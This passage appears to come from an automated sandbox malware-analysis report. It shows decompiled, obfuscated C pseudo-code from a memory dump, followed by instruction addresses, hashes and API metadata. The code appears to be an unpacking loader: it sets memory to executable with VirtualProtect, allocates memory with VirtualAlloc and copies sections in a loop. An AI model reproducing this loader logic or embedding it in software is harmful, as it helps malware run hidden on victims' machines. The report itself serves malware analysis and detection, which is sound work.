						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E03464E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E03462FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x03465f16
0x03465f16
0x03465f16
0x03465f17
0x03465f1b
0x03465f1e
0x03465f20
0x03465f23
0x03465f24
0x03465f28
0x03465f2b
0x03465f2c
0x03465f30
0x03465f39
0x03465f3a
0x03465f3d
0x03465f46
0x03465f4a
0x03465f4d
0x03465f56
0x03465f57
0x03465f5a
0x03465f5d
0x03465f63
0x03465f66
0x03465f6e
0x03465f71
0x03465f72
0x03465f75
0x03465f78
0x03465f7b
0x03465f84
0x03465f85
0x03465f88
0x03465f8b
0x03465f91
0x03465f94
0x03465f9d
0x03465f9e
0x03465fa2
0x03465fa5
0x03465fab
0x03465fb1
0x03465fb5
0x03465fb8
0x03465fbb
0x03465fbe
0x03465fc0
0x03465fcb
0x03465fd2
0x03465fda
0x03465fdd
0x03465fe6
0x03465fe7
0x03465fea
0x03465ff3
0x03465ff4
0x03465ff7
0x03465ffa
0x03465ffa
0x03466002
0x03466005
0x03466009
0x0346600d
0x03466017
0x0346601b
0x03466025
0x03466029
0x0346602c
0x03466032
0x03466039
0x0346604b
0x03466054
0x0346605e
0x03466067
0x03466068
0x0346606b
0x0346606e
0x03466074
0x0346607b
0x0346607e
0x03466088
0x0346608b
0x03466094
0x03466095
0x03466098
0x0346609b
0x034660a1
0x034660a7
0x034660ae
0x034660b7
0x034660be
0x034660c1
0x034660c8
0x034660cb
0x034660d4
0x034660db
0x034660de
0x034660e4
0x034660e7
0x034660ee
0x034660f1
0x034660f4
0x034660f7
0x034660f8
0x03466106
0x03466108
0x0346610b
0x03466114
0x03466118
0x03466124
0x03466127
0x0346612d
0x03466133
0x0346613a
0x03466140
0x03466147
0x0346614a
0x0346614f
0x03466156
0x0346615c
0x0346615f
0x03466162
0x0346616b
0x0346616e
0x03466172
0x03466176
0x0346617a
0x0346617e
0x03466188
0x0346618c
0x03466195
0x0346619c
0x0346619f
0x034661ab
0x034661b2
0x034661be
0x034661c1
0x034661c8
0x034661d1
0x034661db
0x034661de
0x034661e5
0x034661e8
0x034661f1
0x034661fb
0x034661fe
0x03466206
0x03466209
0x03466210
0x03466213
0x03466216
0x03466219
0x0346621a
0x0346621b
0x03466231
0x03466239
0x03466240
0x03466249
0x03466253
0x03466256
0x03466256
0x0346625e
0x03466265
0x0346626b
0x0346626c
0x03466276
0x03466279
0x03466283
0x0346628c
0x03466296
0x03466299
0x0346629f
0x034662a9
0x034662b5
0x034662b8
0x034662c3
0x034662c6
0x034662cd
0x034662ce
0x034662d1
0x034662d2
0x034662dd
0x034662df
0x034662e4
0x034662ec
0x034662f6
0x03466300
0x03466303
0x03466306
0x0346630c
0x03466314
0x0346631b
0x03466321
0x03466321
0x0346632a
0x0346632d
0x03466335
0x03466338
0x0346633b
0x0346633e
0x0346633f
0x03466343
0x0346634d
0x03466351
0x0346635d
0x03466360
0x03466368
0x0346636f
0x03466375
0x0346637c
0x0346637f
0x03466385
0x03466389
0x0346638c
0x03466396
0x03466399
0x034663a2
0x034663a9
0x034663ac
0x034663b4
0x034663bb
0x034663c1
0x034663c7
0x034663ca
0x034663d1
0x034663d3
0x034663dc
0x034663e6
0x034663e9
0x034663f0
0x034663f3
0x034663fd
0x03466400
0x03466403
0x03466412
0x03466417
0x0346641b
0x0346641e
0x03466420
0x03466421
0x0346642c
0x0346642e
0x03466433
0x0346643c
0x0346643f
0x03466448
0x03466452
0x03466455
0x03466455
0x03466461
0x03466468
0x0346646e
0x03466474
0x03466477
0x03466483
0x03466486
0x0346648c
0x03466494
0x0346649b
0x034664a1
0x034664a6
0x034664b2
0x034664b6
0x034664b9
0x034664c1
0x034664c5
0x034664c8
0x034664d4
0x034664db
0x034664e1
0x034664e3
0x034664e6
0x034664f2
0x034664f5
0x034664fe
0x0346650a
0x0346650d
0x03466515
0x03466518
0x0346651f
0x03466522
0x03466525
0x03466528
0x03466529
0x03466537
0x03466539
0x0346653c
0x0346653e
0x03466544
0x0346654e
0x03466551
0x03466558
0x0346655c
0x0346655f
0x0346655f
0x03466567
0x0346656e
0x03466574
0x03466575
0x03466586
0x03466590
0x03466593
0x0346659a
0x0346659e
0x034665a1
0x034665a9
0x034665b0
0x034665b6
0x034665b7
0x034665ca
0x034665cc
0x034665ce
0x034665d2
0x034665d5
0x034665db
0x034665e5
0x034665e8
0x034665ee
0x034665f6
0x034665fd
0x03466603
0x0346660b
0x03466610
0x03466618
0x0346661b
0x03466622
0x03466625
0x0346662b
0x03466632
0x03466635
0x0346663c
0x03466640
0x03466643
0x0346664a
0x0346664e
0x03466651
0x03466659
0x0346665f
0x03466666
0x03466667
0x0346666a
0x0346666b
0x03466671
0x03466674
0x03466677
0x0346667a
0x03466685
0x0346668f
0x03466693
0x03466696
0x0346669d
0x034666a0
0x034666a3
0x034666a3
0x034666a9
0x034666ac
0x034666af
0x034666c2
0x034666c6
0x034666c9
0x034666d2
0x034666dc
0x034666e8
0x034666eb
0x034666f1
0x034666f8
0x034666fe
0x03466703
0x03466706
0x0346670b
0x0346670e
0x03466713
0x0346671a
0x0346671d
0x03466720
0x03466727
0x03466730
0x0346673a
0x0346673d
0x03466743
0x0346674d
0x03466757
0x0346675b
0x0346675e
0x0346676d
0x03466774
0x03466777
0x0346677a
0x0346677d
0x0346677e
0x0346677f
0x03466781
0x0346678c
0x03466791
0x0346679a
0x0346679d
0x034667a7
0x034667ab
0x034667ae
0x034667b4
0x034667b6
0x034667bd
0x034667c3
0x034667c4
0x034667c7
0x034667cc
0x034667cf
0x034667d2
0x034667d2
0x034667d3
0x034667dd
0x034667e0
0x034667e7
0x034667f1
0x034667f4
0x034667f7
0x034667fe
0x03466801
0x0346680b
0x0346680f
0x03466812
0x0346681d
0x03466824
0x03466827
0x0346682a
0x0346682d
0x0346682e
0x0346682f
0x03466841
0x0346684c
0x03466858
0x0346685b
0x03466861
0x03466868
0x0346686e
0x03466873
0x03466876
0x0346687e
0x03466881
0x03466881
0x03466889
0x0346688d
0x03466897
0x0346689b
0x034668a4
0x034668ae
0x034668b1
0x034668bd
0x034668c4
0x034668cd
0x034668d0
0x034668d3
0x034668e0
0x034668e4
0x034668e7
0x034668f0
0x034668f7
0x03466900
0x03466901
0x03466904
0x03466907
0x03466913
0x03466916
0x03466919
0x03466926
0x0346692f
0x03466939
0x0346693c
0x03466945
0x03466951
0x03466954
0x03466960
0x03466968
0x0346696c
0x03466971
0x03466972
0x0346697d
0x0346697f
0x03466984
0x03466986
0x0346698d
0x03466990
0x03466993
0x0346699a
0x0346699d
0x034669a0
0x034669a6
0x034669ae
0x034669b5
0x034669bb
0x034669c0
0x034669c3
0x034669c6
0x034669cd
0x034669d0
0x034669d6
0x034669d9
0x034669e0
0x034669e4
0x034669e7
0x034669f0
0x034669f3
0x034669fb
0x03466a02
0x03466a08
0x03466a0b
0x03466a0e
0x03466a13
0x03466a1a
0x03466a1e
0x03466a24
0x03466a27
0x03466a30
0x03466a33
0x03466a3f
0x03466a46
0x03466a4f
0x03466a52
0x03466a56
0x03466a5d
0x03466a64
0x03466a67
0x03466a6e
0x03466a72
0x03466a75
0x03466a7c
0x03466a80
0x03466a83
0x03466a8a
0x03466a8d
0x03466a90
0x03466a9f
0x03466aa6
0x03466aa9
0x03466aac
0x03466aaf
0x03466ab0
0x03466ab3
0x03466abe
0x03466ac0
0x03466ac3
0x03466ac5
0x03466acc
0x03466acf
0x03466ad2
0x03466ad9
0x03466adc
0x03466adf
0x03466ae5
0x03466aec
0x03466af2
0x03466af2
0x03466af5
0x03466af8
0x03466afc
0x03466aff
0x03466b02
0x03466b09
0x03466b0c
0x03466b0f
0x03466b17
0x03466b1e
0x03466b24
0x03466b25
0x03466b2c
0x03466b2f
0x03466b35
0x03466b3f
0x03466b42
0x03466b49
0x03466b4c
0x03466b4f
0x03466b55
0x03466b5c
0x03466b62
0x03466b65
0x03466b6b
0x03466b71
0x03466b7b
0x03466b7e
0x03466b85
0x03466b88
0x03466b8b
0x03466b91
0x03466b99
0x03466ba0
0x03466ba6
0x03466ba6
0x03466baf
0x03466bbb
0x03466bc5
0x03466bcf
0x03466bd2
0x03466bd5
0x03466bdb
0x03466be2
0x03466be8
0x03466bf4
0x03466bf6
0x03466bfd
0x03466c07
0x03466c10
0x03466c17
0x03466c20
0x03466c21
0x03466c24
0x03466c27
0x03466c2d
0x03466c30
0x03466c3a
0x03466c3d
0x03466c40
0x03466c46
0x03466c4d
0x03466c59
0x03466c5c
0x03466c6b
0x03466c72
0x03466c75
0x03466c78
0x03466c7b
0x03466c7c
0x03466c7d
0x03466c88
0x03466c8a
0x03466c8f
0x03466c98
0x03466c9b
0x03466ca5
0x03466ca9
0x03466cac
0x03466cac
0x03466cb4
0x03466cbb
0x03466cc2
0x03466ccc
0x03466cd5
0x03466cdc
0x03466cdf
0x03466ce8
0x03466cf1
0x03466cf8
0x03466cfb
0x03466d06
0x03466d09
0x03466d10
0x03466d11
0x03466d14
0x03466d15
0x03466d1b
0x03466d1e
0x03466d21
0x03466d24
0x03466d2d
0x03466d30
0x03466d39
0x03466d40
0x03466d43
0x03466d43
0x03466d49
0x03466d51
0x03466d58
0x03466d63
0x03466d6b
0x03466d6d
0x03466d6f
0x03466d73
0x03466d7c
0x03466d86
0x03466d90
0x03466d93
0x03466d96
0x03466d9c
0x03466da4
0x03466dab
0x03466db1
0x03466dba
0x03466dc4
0x03466dc5
0x03466dc8
0x03466dcb
0x03466dce
0x03466dcf
0x03466dd0
0x03466dda
0x03466de4
0x03466de8
0x03466df1
0x03466dfb
0x03466dfe
0x03466e06
0x03466e0d
0x03466e13
0x03466e16
0x03466e19
0x03466e1c
0x03466e20
0x03466e24
0x03466e2e
0x03466e31
0x03466e34
0x03466e3b
0x03466e3e
0x03466e48
0x03466e4b
0x03466e4e
0x03466e5a
0x03466e62
0x03466e66
0x03466e6b
0x03466e6c
0x03466e72
0x03466e75
0x03466e78
0x03466e7b
0x03466e7d
0x03466e84
0x03466e87
0x03466e8a
0x03466e91
0x03466e94
0x03466e97
0x03466e9d
0x03466ea4
0x03466eaa
0x03466eaa
0x03466eb9
0x03466ec8
0x03466ec9
0x03466ec9
0x03466ec9
0x03466ed4
0x03466ed7
0x03466ee0
0x03466ee2
0x03466ee3
0x03466ee3
0x03466ee3
0x03466eec
0x03466eef
0x03466ef2
0x03466f07
0x03466f0a
0x03466f0d
0x03466f10
0x03466f11
0x03466f14
0x03466f1b
0x03466f21
0x03466f22
0x03466f31
0x03466f33
0x03466f39
0x03466f3c
0x03466f40
0x03466f43
0x03466f4b
0x03466f4e
0x03466f4e
0x03466f61
0x03466f68

APIs

VirtualProtect.KERNELBASE ref: 03466B65

Memory Dump Source

Source File: 00000004.00000002.387226313.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: 8e9f9fa12f3ec019ffb9bc09928ec5b501d99ea282ee91bdafb3931ca2513007
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: 7CC21472844608EFEB049FA0C8C57EEBBF5FF48320F0A89AED895AA145D7345164CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0346709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0346709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E03462D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E0346746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
